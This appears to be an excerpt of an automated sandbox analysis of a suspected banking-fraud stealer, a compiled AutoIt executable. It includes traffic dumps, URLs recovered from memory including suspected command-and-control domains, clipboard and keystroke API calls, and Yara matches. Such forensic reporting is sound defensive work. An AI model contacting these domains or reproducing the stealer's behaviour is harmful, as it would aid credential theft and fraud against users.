a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 03:52:06 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OzjY4Tgh6Iiw4Ubvvj%2BFPmFos4pA4IaVciSoI%2Fk2GRhTUc1%2Fa%2FeAw7FM83gPTd5npYeQ7dxHlHleRJ8v5Jna0v%2FaFMtxC69Wob1a6YiW4SkSe2ERVQZx%2FWfYnMFuckHVmx0x"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f02851ffbec7d0c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1876&min_rtt=1876&rtt_var=938&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=538&delivery_rate=0&cwnd=154&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 115<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>10
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 03:52:13 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 03:52:16 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 03:52:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 03:52:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)
                Source: ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)
                Source: ROUTE.EXE, 00000006.00000002.3492415210.000000000406C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000031EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.epayassist.net/px.js?ch=1
                Source: ROUTE.EXE, 00000006.00000002.3492415210.000000000406C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000031EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.epayassist.net/px.js?ch=2
                Source: ROUTE.EXE, 00000006.00000002.3492415210.000000000406C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000031EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.epayassist.net/sk-logabpstatus.php?a=a1l6S1drb3FtcGMvdlFHNDVXelp6VFg3bWdKdW1EME1NODd3V1Zs
                Source: mcPAaApkdo.exe, 00000007.00000002.3491386703.0000000000904000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.erexolsk.shop
                Source: mcPAaApkdo.exe, 00000007.00000002.3491386703.0000000000904000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.erexolsk.shop/jh0k/
                Source: ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000031EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72
                Source: ROUTE.EXE, 00000006.00000002.3491093928.0000000002A7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: ROUTE.EXE, 00000006.00000002.3491093928.0000000002A7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: ROUTE.EXE, 00000006.00000002.3491093928.0000000002A7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: ROUTE.EXE, 00000006.00000002.3491093928.0000000002A7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: ROUTE.EXE, 00000006.00000002.3491093928.0000000002A7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: ROUTE.EXE, 00000006.00000002.3491093928.0000000002A7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: ROUTE.EXE, 00000006.00000003.2324480492.0000000007B5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: ROUTE.EXE, 00000006.00000002.3492415210.0000000004522000.00000004.10000000.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000036A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.erexolsk.shop/jh0k/?gnlxDxt=cE
                Source: ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/cloudhost/
                Source: ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/jiaoyi/
                Source: ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/domain/
                Source: ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/mail/
                Source: ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/webhosting/
                Source: ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/ykj/view.asp?domain=313333.xyz
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CD4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00CD4164
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CD4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00CD4164
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CD3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00CD3F66
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CC001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00CC001C
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CECABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00CECABC

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3491828564.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3491386703.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2149646425.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3491887739.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2142478185.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2150676929.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3490916220.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3491866393.0000000003530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: This is a third-party compiled AutoIt script.0_2_00C63B3A
                Source: CJE003889.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: CJE003889.exe, 00000000.00000000.1646179003.0000000000D14000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6057be2d-e
                Source: CJE003889.exe, 00000000.00000000.1646179003.0000000000D14000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_03b93faf-8
                Source: CJE003889.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_108d42de-b
                Source: CJE003889.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_0e5ea996-0
                Source: C:\Windows\SysWOW64\svchost.exeProcess Stats: CPU usage > 49%
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042CBE3 NtClose,1_2_0042CBE3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72B60 NtClose,LdrInitializeThunk,1_2_03B72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03B72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03B72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B735C0 NtCreateMutant,LdrInitializeThunk,1_2_03B735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B74340 NtSetContextThread,1_2_03B74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B74650 NtSuspendThread,1_2_03B74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72BA0 NtEnumerateValueKey,1_2_03B72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72B80 NtQueryInformationFile,1_2_03B72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72BF0 NtAllocateVirtualMemory,1_2_03B72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72BE0 NtQueryValueKey,1_2_03B72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72AB0 NtWaitForSingleObject,1_2_03B72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72AF0 NtWriteFile,1_2_03B72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72AD0 NtReadFile,1_2_03B72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72FB0 NtResumeThread,1_2_03B72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72FA0 NtQuerySection,1_2_03B72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72F90 NtProtectVirtualMemory,1_2_03B72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72FE0 NtCreateFile,1_2_03B72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72F30 NtCreateSection,1_2_03B72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72F60 NtCreateProcessEx,1_2_03B72F60
